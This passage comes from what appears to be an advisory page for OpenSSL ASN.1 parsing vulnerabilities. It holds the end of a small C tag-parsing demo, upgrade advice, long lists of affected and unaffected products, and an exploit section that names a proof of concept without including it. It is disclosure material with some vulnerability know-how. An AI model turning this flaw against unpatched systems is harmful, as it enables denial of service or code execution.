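    printf("valid high tag: %d, sequence: %d, oversized length: %d\n",
           asn1_tag_or_error(SAMPLE_HIGH_TAG, sizeof SAMPLE_HIGH_TAG),
           asn1_tag_or_error(SAMPLE_SEQ, sizeof SAMPLE_SEQ),
           asn1_tag_or_error(SAMPLE_LONG_LEN, sizeof SAMPLE_LONG_LEN));
    return 0;
}
```

A tag that wraps to zero or to a negative number is the dangerous case: any later code that trusts it as a table index or a type selector works from a value the sender never legitimately encoded.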

- Timeline

2003-09-30 Unknown
Unknown Unknown

- Solution

Upgrade to version 0.9.7c or 0.9.6k or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds. Recompile any OpenSSL applications statically linked to OpenSSL libraries.

- Related references

- Vulnerability author

- Vulnerability information

OpenSSL ASN.1 Parsing Vulnerabilities
Unknown 8732
Yes No
2003-09-30 12:00:00 2007-11-05 03:25:00
Discovery is credited to NISCC and Stephen Henson.

- Affected software versions

VMWare GSX Server 2.5.1 build 5336
VMWare ESX Server 2.0 build 5257
VMWare ESX Server 1.5.2
Tarantella Enterprise 3 3.30
Tarantella Enterprise 3 3.20 0
- HP HP-UX 11.20
- HP HP-UX 11.11
- HP HP-UX 11.0 4
- HP HP-UX 11.0
- IBM AIX 4.3.3
- IBM AIX 5.1
- Red Hat Linux 6.2
- RedHat Linux 7.2
- RedHat Linux 7.1
- RedHat Linux 7.0
- S.u.S.E. Linux 7.3
- S.u.S.E. Linux 7.2
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3
- SCO eServer 2.3.1
- SCO eServer 2.3
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
Tarantella Enterprise 3 3.11
Tarantella Enterprise 3 3.10
Tarantella Enterprise 3 3.0 1
Tarantella Enterprise 3 3.0
Sun Solaris 9_x86
Sun Solaris 9
Sun ONE Web Server 6.0 SP6
Sun ONE Web Server 6.0 SP5
Sun ONE Web Server 6.0 SP4
Sun ONE Web Server 6.0 SP3
Sun ONE Web Server 6.0 SP2
Sun ONE Web Server 6.0 SP1
Sun ONE Web Server 6.0
Sun ONE Web Server 4.1 SP9
Sun ONE Web Server 4.1 SP8
Sun ONE Web Server 4.1 SP7
Sun ONE Web Server 4.1 SP6
Sun ONE Web Server 4.1 SP5
Sun ONE Web Server 4.1 SP5
Sun ONE Web Server 4.1 SP4
Sun ONE Web Server 4.1 SP3
Sun ONE Web Server 4.1 SP2
Sun ONE Web Server 4.1 SP14
Sun ONE Web Server 4.1 SP13
Sun ONE Web Server 4.1 SP12
Sun ONE Web Server 4.1 SP11
Sun ONE Web Server 4.1 SP10
Sun ONE Web Server 4.1 SP1
Sun ONE Directory Server 5.1 x86
Sun ONE Directory Server 5.1 SP2
Sun ONE Directory Server 5.1 SP1
Sun ONE Directory Server 5.1
- HP HP-UX 11.0
- HP HP-UX 11i v1
- IBM AIX 4.3.3
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- RedHat Linux 7.2
- Sun Linux 5.0.3
- Sun Linux 5.0
+ Sun Solaris 9_x86
+ Sun Solaris 9
- Sun Solaris 8_x86
- Sun Solaris 8_sparc
Sun ONE Application Server 7.0 UR2 Standard Edition
Sun ONE Application Server 7.0 UR2 Platform Edition
Sun ONE Application Server 7.0 UR1 Standard Edition
Sun ONE Application Server 7.0 UR1 Platform Edition
Sun ONE Application Server 7.0 Standard Edition
Sun ONE Application Server 7.0 Platform Edition
Sun Java System Web Server 6.1
Sun Grid Engine 5.3 x86
Sun Grid Engine 5.3 Sun Linux
Sun Grid Engine 5.3 64-bit SPARC
Sun Grid Engine 5.3 32-bit SPARC
Sun Cluster 3.1
Sun Cluster 3.0
Stonesoft StoneGate 2.2.1
Stonesoft StoneGate 2.2
Stonesoft StoneGate 2.1
Stonesoft StoneGate 2.0.9
Stonesoft StoneGate 2.0.8
Stonesoft StoneGate 2.0.7
Stonesoft StoneGate 2.0.6
Stonesoft StoneGate 2.0.5
Stonesoft StoneGate 2.0.4
Stonesoft StoneGate 2.0.1
Stonesoft StoneGate 1.7.2
Stonesoft StoneGate 1.7.1
Stonesoft StoneGate 1.7
Stonesoft StoneGate 1.6.3
Stonesoft StoneGate 1.6.2
Stonesoft StoneGate 1.5.18
Stonesoft StoneGate 1.5.17
Stonesoft StoneBeat WebCluster 2.5
Stonesoft StoneBeat WebCluster 2.0
Stonesoft StoneBeat SecurityCluster 2.5
Stonesoft StoneBeat SecurityCluster 2.0
Stonesoft StoneBeat High Availability 3.1
Stonesoft StoneBeat FullCluster for Raptor 2.5
Stonesoft StoneBeat FullCluster for Raptor 2.0
Stonesoft StoneBeat FullCluster for ISA Server 3.0
Stonesoft StoneBeat FullCluster for Gauntlet 2.0
Stonesoft StoneBeat FullCluster for Firewall-1 3.0
Stonesoft StoneBeat FullCluster for Firewall-1 2.0
SSLeay SSLeay 0.9.1
SSLeay SSLeay 0.9
SSLeay SSLeay 0.8.1
SSLeay SSLeay 0.6.6
SSH Communications Security SSH2 3.2.5
SSH Communications Security SSH2 3.2.4
SSH Communications Security SSH2 3.2.3
SSH Communications Security SSH2 3.2.2
SSH Communications Security SSH2 3.2.1
SSH Communications Security SSH2 3.2
SSH Communications Security SSH2 3.1.8
SSH Communications Security SSH2 3.1.7
SSH Communications Security SSH2 3.1.6
SSH Communications Security SSH2 3.1.5
SSH Communications Security SSH2 3.1.4
SSH Communications Security SSH2 3.1.3
SSH Communications Security SSH2 3.1.2
SSH Communications Security SSH2 3.1.1
SSH Communications Security SSH2 3.1
SSH Communications Security SSH Sentinel 1.4
SSH Communications Security IPSEC Express Toolkit
Snapgear Snapgear OS 1.8.4
SmoothWall GPL 1.0
SmoothWall Express 2.0 beta
SGI ProPack 2.3
SGI ProPack 2.2.1
SGI IRIX 6.5.22
SGI IRIX 6.5.21 m
SGI IRIX 6.5.21 f
SGI IRIX 6.5.21
SGI IRIX 6.5.20 m
SGI IRIX 6.5.20 f
SGI IRIX 6.5.20
SGI IRIX 6.5.19 m
SGI IRIX 6.5.19 f
SGI IRIX 6.5.19
SCO Open Server 5.0.7
SCO Open Server 5.0.6
SCO Open Server 5.0.5
RedHat Linux 9.0 i386
Oracle Oracle9i Standard Edition 9.2
Oracle Oracle9i Standard Edition 9.0.1
Oracle Oracle9i Standard Edition 8.1.7
Oracle Oracle9i Personal Edition 9.2
Oracle Oracle9i Personal Edition 9.0.1
Oracle Oracle9i Personal Edition 8.1.7
Oracle Oracle9i Enterprise Edition 9.2 .0
Oracle Oracle9i Enterprise Edition 9.0.1
Oracle Oracle9i Enterprise Edition 8.1.7
Oracle Oracle9i Application Server 9.0.3
Oracle Oracle9i Application Server 9.0.2
Oracle Oracle9i Application Server 1.0.2 .2
Oracle Oracle9i Application Server 1.0.2 .1s
Oracle Oracle HTTP Server 9.2 .0
Oracle Oracle HTTP Server 9.0.1
Oracle Oracle HTTP Server 8.1.7
+ Apache Software Foundation Apache 1.3.12
+ Oracle Oracle8 8.1.7
+ Oracle Oracle8i Enterprise Edition 8.1.7 .0.0
+ Oracle Oracle8i Standard Edition 8.1.7
OpenSSL Project OpenSSL 0.9.7 beta3
OpenSSL Project OpenSSL 0.9.7 beta2
OpenSSL Project OpenSSL 0.9.7 beta1
OpenSSL Project OpenSSL 0.9.7 b
OpenSSL Project OpenSSL 0.9.7 a
+ Conectiva Linux 9.0
+ OpenPKG OpenPKG Current
OpenSSL Project OpenSSL 0.9.7
OpenSSL Project OpenSSL 0.9.6 j
OpenSSL Project OpenSSL 0.9.6 i
OpenSSL Project OpenSSL 0.9.6 h
OpenSSL Project OpenSSL 0.9.6 g
OpenSSL Project OpenSSL 0.9.6 e
OpenSSL Project OpenSSL 0.9.6 d
+ Slackware Linux 8.1
OpenSSL Project OpenSSL 0.9.6 c
OpenSSL Project OpenSSL 0.9.6 b
OpenSSL Project OpenSSL 0.9.6 a
+ Conectiva Linux 7.0
+ NetBSD NetBSD 1.5.3
+ NetBSD NetBSD 1.5.2
+ NetBSD NetBSD 1.5.1
+ NetBSD NetBSD 1.5
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
OpenSSL Project OpenSSL 0.9.6
OpenSSL Project OpenSSL 0.9.5 a
OpenBSD OpenBSD 3.4
OpenBSD OpenBSD 3.3
OpenBSD OpenBSD 3.2
OpenBSD OpenBSD 3.1
Novell Nsure Audit 1.0.1
Novell Netware 6.5
Novell Netware 6.0
Novell Netware 5.1
Novell NetMail 3.10 e
Novell NetMail 3.10 d
Novell NetMail 3.10 c
Novell NetMail 3.10 b
Novell NetMail 3.10 a
Novell NetMail 3.10
Novell NetMail 3.1
Novell NetMail 3.0.3 b
Novell NetMail 3.0.3 a
- Microsoft Windows 3.11
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95 SR2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
- RedHat Linux 7.3
- Sun Solaris 9
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
- Sun Solaris 2.5
Novell NetMail 3.0.3
Novell NetMail 3.0.1
Novell International Cryptographic Infostructure (NICI) 2.6.1
Novell iManager 2.0.2
Novell iManager 2.0
Novell iManager 1.5
Novell iChain Server 2.2 SP1
Novell iChain Server 2.2 FP1a
Novell iChain Server 2.2 FP1a
Novell iChain Server 2.2 FP1
Novell iChain Server 2.2
Novell GroupWise WebAccess 6.5 SP2
Novell GroupWise WebAccess 6.5 SP1
Novell GroupWise WebAccess 6.5
Novell GroupWise WebAccess 6.0 SP4
Novell GroupWise Internet Agent 6.5.1
Novell Groupwise 6.5 SP2
Novell Groupwise 6.0 SP4
Novell eDirectory 8.7.1 SU1
Novell eDirectory 8.7.1
Novell eDirectory 8.7
Novell eDirectory 8.6.2
Novell eDirectory 8.5.27
Novell eDirectory 8.5.12 a
Novell eDirectory 8.5
Novell eDirectory 8.0
Novell BorderManager 3.8
Mandriva Linux Mandrake 9.2
Mandriva Linux Mandrake 9.1 ppc
Mandriva Linux Mandrake 9.1
Mandriva Linux Mandrake 9.0
Mandriva Linux Mandrake 8.2
MandrakeSoft Multi Network Firewall 2.0
MandrakeSoft Corporate Server 2.1 x86_64
MandrakeSoft Corporate Server 2.1
Juniper Networks T-series Router T640
Juniper Networks T-series Router T320
Juniper Networks SDX-300 3.1.1
Juniper Networks SDX-300 3.1
Juniper Networks M-series Router M5
Juniper Networks M-series Router M40e
Juniper Networks M-series Router M40
Juniper Networks M-series Router M20
Juniper Networks M-series Router M160
Juniper Networks M-series Router M10
Ingate SIParator 3.2.1
Ingate SIParator 3.2
Ingate Firewall 3.2.1
Ingate Firewall 3.2
IBM Rational Rose 2000
IBM HTTP Server 2.0.47
IBM HTTP Server 2.0.42 .2
IBM HTTP Server 2.0.42
IBM HTTP Server 1.3.28
IBM HTTP Server 1.3.26
IBM HTTP Server 1.3.19
IBM HTTP Server 1.3.12 .4
IBM HTTP Server 1.3.12 .3
IBM HTTP Server 1.3.12 .2
HP HP-UX AAA Server A.06.01.02
+ HP HP-UX 11.11
+ HP HP-UX 11.0
HP HP-UX 11.23
HP HP-UX 11.22
HP HP-UX 11.20
HP HP-UX 11.11
HP HP-UX 11.0
HP HP WBEM Services for HP-UX A.01.05.05
F5 ISMan
F5 FirePass
F5 BigIP 4.5
F5 BigIP 4.4
F5 BigIP 4.3
F5 BigIP 4.2
F5 BigIP 2.1
F5 BigIP 2.0
F5 3-DNS 4.5
F5 3-DNS 4.4
F5 3-DNS 4.3
F5 3-DNS 4.2
F-Secure SSH 5.3 For Windows
F-Secure SSH 5.2 For Windows
F-Secure SSH 5.1 For Windows
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
F-Secure SSH 3.2.3 For UNIX
F-Secure SSH 3.2 .0 For UNIX
F-Secure SSH 3.1 .0 For UNIX
F-Secure SSH 3.1 .0
F-Secure SSH 3.0.1 For UNIX
- FreeBSD FreeBSD 5.0
- HP HP-UX 11.0
- HP HP-UX 11i v1
- IBM AIX 4.3
- RedHat Linux 7.2
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
Cray Cray Open Software 3.4
Computer Associates eTrust Security Command Center 1.0
Cisco Threat Response
Cisco SN 5428 Storage Router SN5428-3.3.2-K9
Cisco SN 5428 Storage Router SN5428-3.3.1-K9
Cisco SN 5428 Storage Router SN5428-3.2.2-K9
Cisco SN 5428 Storage Router SN5428-3.2.1-K9
Cisco SN 5428 Storage Router SN5428-2.5.1-K9
Cisco SN 5428 Storage Router SN5428-2-3.3.2-K9
Cisco SN 5428 Storage Router SN5428-2-3.3.1-K9
Cisco SIP Proxy Server
Cisco Secure Policy Manager 3.0.1
Cisco PIX Firewall 520
Cisco PIX Firewall 515
Cisco Network Analysis Module 0
Cisco IOS 12.2SY
Cisco IOS 12.2SX
Cisco IOS 12.1(19)E
Cisco IOS 12.1(13.4)E
Cisco IOS 12.1(11b)E
Cisco IOS 12.1(11)E
Cisco GSS 4480 Global Site Selector
Cisco Firewall Services Module (FWSM) 0
Cisco CSS11000 Content Services Switch
Cisco CSS Secure Content Accelerator 2.0
Cisco CSS Secure Content Accelerator 1.0
Cisco CiscoWorks Common Services 2.2
Cisco CiscoWorks 1105 Wireless LAN Solution Engine
Cisco CiscoWorks 1105 Hosting Solution Engine
Cisco Application & Content Networking Software
Check Point Software VPN-1 4.1 SP4
Check Point Software VPN-1 4.1 SP3
Check Point Software VPN-1 4.1 SP2
Check Point Software VPN-1 4.1 SP1
Check Point Software VPN-1 4.1
Check Point Software Providor-1 4.1 SP4
Check Point Software Providor-1 4.1 SP3
Check Point Software Providor-1 4.1 SP2
Check Point Software Providor-1 4.1 SP1
Check Point Software Providor-1 4.1
Check Point Software Nokia Voyager 4.1
Check Point Software Next Generation FP3 HF2
Check Point Software Next Generation FP3 HF1
Check Point Software Next Generation FP3
Check Point Software Next Generation FP2
Check Point Software Next Generation FP1
Check Point Software Firewall-1 4.1 SP6
Check Point Software Firewall-1 4.1 SP5
Check Point Software Firewall-1 4.1 SP4
Check Point Software Firewall-1 4.1 SP3
Check Point Software Firewall-1 4.1 SP2
Check Point Software Firewall-1 4.1 SP1
Check Point Software Firewall-1 4.1
Check Point Software Firewall-1 4.0 SP8
Check Point Software Firewall-1 4.0 SP7
Check Point Software Firewall-1 4.0 SP6
Check Point Software Firewall-1 4.0 SP5
Check Point Software Firewall-1 4.0 SP4
Check Point Software Firewall-1 4.0 SP3
Check Point Software Firewall-1 4.0 SP2
Check Point Software Firewall-1 4.0 SP1
Check Point Software Firewall-1 4.0
Check Point Software Firewall-1 3.0
BorderWare Firewall Server 7.0
Blue Coat Systems Security Gateway OS 3.0
Blue Coat Systems Security Gateway OS 2.0
Blue Coat Systems CacheOS CA/SA 4.1.10
Apple Mac OS X Server 10.2.7
Apple Mac OS X Server 10.2.6
Apple Mac OS X Server 10.2.5
Apple Mac OS X Server 10.2.4
Apple Mac OS X Server 10.2.3
Apple Mac OS X Server 10.2.2
Apple Mac OS X Server 10.2.1
Apple Mac OS X Server 10.2
Apple Mac OS X 10.2.7
Apple Mac OS X 10.2.6
Apple Mac OS X 10.2.5
Apple Mac OS X 10.2.4
Apple Mac OS X 10.2.3
Apple Mac OS X 10.2.2
Apple Mac OS X 10.2.1
Apple Mac OS X 10.2

- Unaffected program versions

Tarantella Enterprise 3 3.40
Sun Solaris 8_x86
Sun Solaris 8_sparc
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun ONE Web Server 6.0 SP7
Sun ONE Web Server 4.1 SP14
Sun ONE Directory Server 5.1 SP3
Sun ONE Application Server 7.0 UR2 Upgrade Standard
Sun ONE Application Server 7.0 UR2 Upgrade Platform
Sun Java System Web Server 6.1 SP1
Sun Cluster 2.2
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
Sun Cluster 2.1
- Sun Solaris 2.5.1
- Sun Solaris 2.6
SSH Communications Security SSH2 3.2.9
SSH Communications Security SSH Sentinel 1.4.1
Snapgear Snapgear OS 1.8.5
OpenSSL Project OpenSSL 0.9.7 c
+ OpenPKG OpenPKG 2.0
+ Slackware Linux 9.1
+ Slackware Linux 9.0
+ Slackware Linux -current
OpenSSL Project OpenSSL 0.9.6 k
+ Blue Coat Systems CacheOS CA/SA 4.1.10
+ Blue Coat Systems Security Gateway OS 3.1
+ Blue Coat Systems Security Gateway OS 3.0
+ Blue Coat Systems Security Gateway OS 2.1.5001 SP1
+ Blue Coat Systems Security Gateway OS 2.1.9
+ Blue Coat Systems Security Gateway OS 2.0
+ Slackware Linux 8.1
Novell Nsure Audit 1.0.3
Novell Nsure Audit 1.0.2
Novell NetMail 3.1 f
Novell iManager 2.5
Novell eDirectory 8.7.1 SU1
Ingate SIParator 3.3.1
Ingate Firewall 3.3.1
IBM Rational RequisitePro 7.0
HP HP-UX AAA Server A.06.01.02.04
HP HP WBEM Services for HP-UX A.01.05.07
Apple Mac OS X Server 10.2.8
Apple Mac OS X 10.2.8

- Vulnerability discussion

Multiple vulnerabilities were reported in the ASN.1 parsing code in OpenSSL. Attackers could exploit these issues to cause a denial of service or to execute arbitrary code.

- Exploit

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

The following proof-of-concept brute-force exploit has been supplied by Bram Matthys (Syzop):

- Solution

Please see the referenced advisories for more information.


HP HP-UX AAA Server A.06.01.02

OpenSSL Project OpenSSL 0.9.6 d

OpenSSL Project OpenSSL 0.9.6 a

OpenSSL Project OpenSSL 0.9.7 beta1

OpenSSL Project OpenSSL 0.9.7 a

SSH Communications Security SSH Sentinel 1.4

Novell iManager 2.0

IBM HTTP Server 2.0.42

Novell NetMail 3.0.1

Novell NetMail 3.0.3 a

SSH Communications Security SSH2 3.1.4

SSH Communications Security SSH2 3.1.6

Novell NetMail 3.10 e

Ingate Firewall 3.2.1

SSH Communications Security SSH2 3.2.2

Sun ONE Directory Server 5.1

Sun Grid Engine 5.3 x86

SGI IRIX 6.5.20 f

SGI IRIX 6.5.20 m

SGI IRIX 6.5.21 m

Mandriva Linux Mandrake 9.1

- Related references

 

 
